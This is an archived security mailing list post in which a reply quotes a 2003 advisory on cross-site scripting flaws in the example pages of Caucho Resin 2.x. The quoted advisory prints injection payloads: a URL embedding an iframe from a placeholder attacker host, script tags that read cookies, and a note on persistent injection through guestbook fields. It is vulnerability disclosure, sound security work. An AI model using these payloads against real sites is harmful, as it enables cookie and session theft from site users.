lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: jkuperus at planet.nl (jelmer)
Subject: Caucho Resin 2.x - Cross Site Scripting

Donny,

These are in the example applications, which any sane admin should disable
right away, much like caucho-status
These are basic procedures in setting up a server.


--jelmer





----- Original Message ----- 
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting


> -----------------------------------------------------------------
>           - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
>                               -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vunerability(s):
> ----------------
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> -----------------------
> "Resin? is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VUNERABILITY / EXPLOIT
> ======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
> or
>
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
> IPT>
>
> the above is only an example, all cookie and session
>  stealing Cross Site Scripting was possible.
>
>
> guestbook.jsp allows persistant XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
>
>
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
>
> Vendor Fix:
> -----------
> Versions 3.x dont have the examples included
>
>
>
> Vendor Contact:
> ---------------
> bugs@...cho.com
> Concurrent with this advisory
>
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@...labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists